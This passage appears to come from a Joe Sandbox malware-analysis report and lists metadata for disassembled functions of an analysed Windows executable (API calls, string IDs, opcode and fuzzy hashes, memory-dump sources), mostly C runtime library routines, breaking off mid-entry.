                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                      • String ID: *$.$.
                                      • API String ID: 4036615347-2112782162
                                      • Opcode ID: c364aa7ecad30e1254029f38b6a57422b9c5e363ee4b37ae7658774aa9e75e39
                                      • Instruction ID: 624643d2af3229b99a819bc328ec9822a876d738f59f95453bcddc7472bd1619
                                      • Opcode Fuzzy Hash: c364aa7ecad30e1254029f38b6a57422b9c5e363ee4b37ae7658774aa9e75e39
                                      • Instruction Fuzzy Hash: 6451EDB2B10A5485FB12DBA7A9407ED73E0B749BD8F548126EF5927BA5EF38C042C300
                                      Function 00000001400046C8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000000014000474B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: DebugDebuggerErrorLastOutputPresentString
                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                      • API String ID: 389471666-631824599
                                      • Opcode ID: 84d04b534f0832b10a89640bf131631096d3170d9866c81e3a2688c7e5cda54f
                                      • Instruction ID: 9d174ee9d58f08d33f221478d192a68120145db8746fe30f656db89f5d9125e9
                                      • Opcode Fuzzy Hash: 84d04b534f0832b10a89640bf131631096d3170d9866c81e3a2688c7e5cda54f
                                      • Instruction Fuzzy Hash: F411AC72210B80A7F74ADB23E6443E973A0FB483C0F404524EB5987AA2EF79D074C700
                                      Function 000000014000AB44 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      • Opcode ID: b244cf1de7db0b0d67af211d7cb1131ba2d79bbee309d1a629165df779e31f8e
                                      • Instruction ID: 65fe904cf7ba262de353ee627477bf0c51d5cb77785aa7483af7b2b631f21bdf
                                      • Opcode Fuzzy Hash: b244cf1de7db0b0d67af211d7cb1131ba2d79bbee309d1a629165df779e31f8e
                                      • Instruction Fuzzy Hash: 7A3123B271068445EB61DB37A804BEAB791F39ABE4F548625BF6A07BE5DA3CC4018300
                                      Function 000000014000F6B8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise_clrfp
                                      • String ID:
                                      • API String ID: 15204871-0
                                      • Opcode ID: 5206326f4560dfc180925b3f6828435af6a3195b703b0436355fed7301d20b3a
                                      • Instruction ID: 8280efab88331e923b2d5ffd7080e814f94fcf89afacba91d784502ee77bfab9
                                      • Opcode Fuzzy Hash: 5206326f4560dfc180925b3f6828435af6a3195b703b0436355fed7301d20b3a
                                      • Instruction Fuzzy Hash: EFB12CB7610B888BEB56CF2AD4453A87BA0F388B88F15C915EB5D87BB4CB39C451D701
                                      Function 0000000140009248 Relevance: 1.4, Strings: 1, Instructions: 139COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: c41a1cc13bc989c7c1bf62f537727569f62d510875ace651041afa3cfe282a66
                                      • Instruction ID: 0d5486c96558b43546ee77247e0be0d7310829cdcb12e311ee62cb0fd08255b1
                                      • Opcode Fuzzy Hash: c41a1cc13bc989c7c1bf62f537727569f62d510875ace651041afa3cfe282a66
                                      • Instruction Fuzzy Hash: 39416FB2310A4886EA49CF6AE5543D9B3A1F34CFC4F499026EF5D8B7A4EA3DC5468300
                                      Function 00000001400010FC Relevance: .1, Instructions: 55COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1d4144b779dec8c52e7fdaa5c7305b7d99a61cd7e10e9453af49e76d1bb080b1
                                      • Instruction ID: c33aa83fde480e7d9ea5238ffe0d1e9cac7217e076ad76c79a130d7b7b159366
                                      • Opcode Fuzzy Hash: 1d4144b779dec8c52e7fdaa5c7305b7d99a61cd7e10e9453af49e76d1bb080b1
                                      • Instruction Fuzzy Hash: 460190F0F255AD09FF599873AA257E240424369BD0C09E030DE0C7BB88E06D9D824104
                                      Function 000000014000F290 Relevance: .0, Instructions: 32COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d03fc386cee5edb1382ea40f6ffc4ef11c987e5dd3c396b5bc239094b71504e1
                                      • Instruction ID: d5343f999d37678c060b61efe1f76388260f4d72a62b965f4d01a54797dc4237
                                      • Opcode Fuzzy Hash: d03fc386cee5edb1382ea40f6ffc4ef11c987e5dd3c396b5bc239094b71504e1
                                      • Instruction Fuzzy Hash: A3F062B17282948BDBAACF2DA802B5977E0F30C3C4F908029E68987F54D37DC0609F04
                                      Function 000000014000510C Relevance: .0, Instructions: 2COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a5dcecb1721a6c2a0bdcdca376210b99c52dd83875adeac6d3bd41af53d55e2
                                      • Instruction ID: cc727b492c041beb5a92ad447fd2a0eb8db98e9993b8da34eebdf01610c1968c
                                      • Opcode Fuzzy Hash: 2a5dcecb1721a6c2a0bdcdca376210b99c52dd83875adeac6d3bd41af53d55e2
                                      • Instruction Fuzzy Hash: 56A00271154C08E0E70ADB02F8617E56330E39A389F404091E71D47071DB39C841C344
                                      Function 005AB525 Relevance: 64.8, APIs: 1, Strings: 36, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 005ABC65: LoadLibraryA.KERNELBASE ref: 005ABCD2
                                      • SleepEx.KERNELBASE ref: 005AB60B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287953577.00000000005AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AB000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ab000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: LibraryLoadSleep
                                      • String ID: .$.$2$2$3$3$EpS$P$S$c$d$d$e$e$e$e$e$e$k$l$l$l$l$l$l$n$o$p$r$r$r$s$s$s$t$u
                                      • API String ID: 2118945035-4201720986
                                      • Opcode ID: 021ec8aca0d749c274d7480b5682be404f749c653c6b4338c4e8b6d91ade5567
                                      • Instruction ID: 29f2e0270e7db93dc08e2375d5cb1e6f611586abf49fafa0af259c28d4224597
                                      • Opcode Fuzzy Hash: 021ec8aca0d749c274d7480b5682be404f749c653c6b4338c4e8b6d91ade5567
                                      • Instruction Fuzzy Hash: D6416D2050C7C0C9E3629778845979FFFE26BA3748F48489DA1C94A293CBFB85588777
                                      Function 0000000140004844 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 98libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: AddressHandleProc$CriticalModuleSection__scrt_fastfail$CloseCountCreateDeleteEventInitializeSpin__scrt_initialize_onexit_tables
                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                      • API String ID: 3861935373-1714406822
                                      • Opcode ID: 23178e0efa6d8e425eb324706edc119e6ca7b7928795a1b163fb530ddc4d6ce4
                                      • Instruction ID: 0788782dd8a65418c3989520a7403c478861d70f7c8d39ef9c9ca7ea77e151ee
                                      • Opcode Fuzzy Hash: 23178e0efa6d8e425eb324706edc119e6ca7b7928795a1b163fb530ddc4d6ce4
                                      • Instruction Fuzzy Hash: CF412EB0201B4182FB1BDB26F8503D56361AB8E7D1F985125AB1E4B7B6DF3EC545C305
                                      Function 0000000140004D90 Relevance: 15.1, APIs: 10, Instructions: 94COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: __scrt_fastfail__scrt_is_nonwritable_in_current_image$__scrt_acquire_startup_lock__scrt_get_show_window_mode__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                      • String ID:
                                      • API String ID: 1664584033-0
                                      • Opcode ID: 472436d1f049dd52d889ebb830c91296deb9e460af84f85dba26e50def9a7604
                                      • Instruction ID: 233db52ef5ef4436f2406ba2e64883877d3cbfed7755f5fbf8731bd3284d5728
                                      • Opcode Fuzzy Hash: 472436d1f049dd52d889ebb830c91296deb9e460af84f85dba26e50def9a7604
                                      • Instruction Fuzzy Hash: 2C316BF120464586FB67FB67F4613E92291AB8D7C4F444025BB4A0BAF7DE79C8048349
                                      Function 0000000140004960 Relevance: 10.5, APIs: 7, Instructions: 45COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: __scrt_fastfail$CloseCreateCriticalDeleteEventHandleSection__scrt_initialize_onexit_tables_onexit
                                      • String ID:
                                      • API String ID: 3164422487-0
                                      • Opcode ID: 83cd550192942f7becd0f849c71b4693efbe5731a5386cace0302889684c6273
                                      • Instruction ID: 2592f0b118721ef6636a6a489feb38ed522fdd02e52cc67dd3d5f5cb9945c00e
                                      • Opcode Fuzzy Hash: 83cd550192942f7becd0f849c71b4693efbe5731a5386cace0302889684c6273
                                      • Instruction Fuzzy Hash: EA017CB060260082FB5AEB72F4513E91250AF8E3C0F841429BB0E0B6F3CE3AD445C609
                                      Function 00000001400089E4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 1872a58244535851d29ff8dd527ccca21a8c7e2e43d0e59298a4f4627e764fc2
                                      • Instruction ID: 718dad1abc3a16d5621db6fd105de10dce4bca97f4cd99b75eadd5381403e9fa
                                      • Opcode Fuzzy Hash: 1872a58244535851d29ff8dd527ccca21a8c7e2e43d0e59298a4f4627e764fc2
                                      • Instruction Fuzzy Hash: 21F04971711B8082EF5A8B12F4903E92360BBCCBD0F48501ABB4B4B675DE7CC599C700
                                      Function 000000014000E5BC Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID:
                                      • API String ID: 3215553584-0
                                      • Opcode ID: e41b20cec72f5249f04b32754f850369c2c37b01f5cce8c2ea33383d58ca69fc
                                      • Instruction ID: 17dcab79655dc74da92e90312785fc0d5e90b3d65ddbad97e9544b5806760717
                                      • Opcode Fuzzy Hash: e41b20cec72f5249f04b32754f850369c2c37b01f5cce8c2ea33383d58ca69fc
                                      • Instruction Fuzzy Hash: EB818AB2B10A9099FB66DB67A8807ED67A0B34CBC8F444116FF0A677B5DB35C446C710
                                      Function 000000014000DF30 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                      • String ID:
                                      • API String ID: 3659116390-0
                                      • Opcode ID: 9e95024c4d837dc4ab072ebc8e89ac285f20d477f44c1b6abb523d34418a7719
                                      • Instruction ID: c271293a2d50c27e3f1adf003554f2f60c3133e0711f862266d0d5286f668a9b
                                      • Opcode Fuzzy Hash: 9e95024c4d837dc4ab072ebc8e89ac285f20d477f44c1b6abb523d34418a7719
                                      • Instruction Fuzzy Hash: 22519F72B20A9089E712CB76E8443EC7BB1F748BD8F048116EF5A57BA9DB74C196C710
                                      Function 000000014000A2A4 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetProcAddress.KERNEL32(?,?,FFFFFFFF,000000014000A57F,?,?,00000000,0000000140009FEB,?,?,?,000000014000854D), ref: 000000014000A3C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: AddressProc
                                      • String ID:
                                      • API String ID: 190572456-0
                                      • Opcode ID: 9cbeb4ca6971df0b88414592779824b680e15a7127d5018182a21cf14d62aa74
                                      • Instruction ID: 667c84f90310ed7a94f2064a1c113f9d7396c074bffcb949e620db36c05b3dfa
                                      • Opcode Fuzzy Hash: 9cbeb4ca6971df0b88414592779824b680e15a7127d5018182a21cf14d62aa74
                                      • Instruction Fuzzy Hash: 7841D1B2316A0096FA1BCB57B8147DA62D5B79DBD0F198525FF6A4F7A4EB3CC5408300
                                      Function 000000014000F0A4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: _set_statfp
                                      • String ID:
                                      • API String ID: 1156100317-0
                                      • Opcode ID: b7664432e41ba77913d69028e7edc508c49d41399d74719a20a153286b896ad0
                                      • Instruction ID: 3215093202bd68c56bac71dd110fdba30e2872be93819337cad5d5ac75e4a3d6
                                      • Opcode Fuzzy Hash: b7664432e41ba77913d69028e7edc508c49d41399d74719a20a153286b896ad0
                                      • Instruction Fuzzy Hash: 7011A9F671060181F6AA917BF8463F931416B5E3F0F18C624BB6687DFBCE7484457541
                                      Function 000000014000E35C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                      • String ID: U
                                      • API String ID: 2456169464-4171548499
                                      • Opcode ID: 33997245d6dba02e41cb1da312fb3ff6abb9d07e8e32837fd380ab658126b611
                                      • Instruction ID: a648a5e7f909605d88ffe647cff2544ba9e667ff7801489ca87a02acaeb14277
                                      • Opcode Fuzzy Hash: 33997245d6dba02e41cb1da312fb3ff6abb9d07e8e32837fd380ab658126b611
                                      • Instruction Fuzzy Hash: E6416D72725A8482EB21DF66F8483EAA7A1F788BD4F444021EF4D97BA4DB7CC541C740
                                      Function 000000014000774E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                      • String ID: csm
                                      • API String ID: 2280078643-1018135373
                                      • Opcode ID: 68f393005c6e6b7f241a725cd1de3d0fd0629206885ed32bef75221d50612380
                                      • Instruction ID: 1d90ec48780e65de3b793b436a9636d8dcea98b918e631f4702ee5be84cd9def
                                      • Opcode Fuzzy Hash: 68f393005c6e6b7f241a725cd1de3d0fd0629206885ed32bef75221d50612380
                                      • Instruction Fuzzy Hash: AE2117B660464086E672DF26F040B9EB7A1F38DBE5F054211EF99077A5CF38D88ACB01
                                      Function 0000000140009EF8 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,00000001400098B1,?,?,00000000,0000000140004D36), ref: 0000000140009F02
                                      • SetLastError.KERNEL32(?,?,?,00000001400098B1,?,?,00000000,0000000140004D36), ref: 0000000140009F6A
                                      • SetLastError.KERNEL32(?,?,?,00000001400098B1,?,?,00000000,0000000140004D36), ref: 0000000140009F80
                                      • abort.LIBCMT ref: 0000000140009F86
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmpDownload File
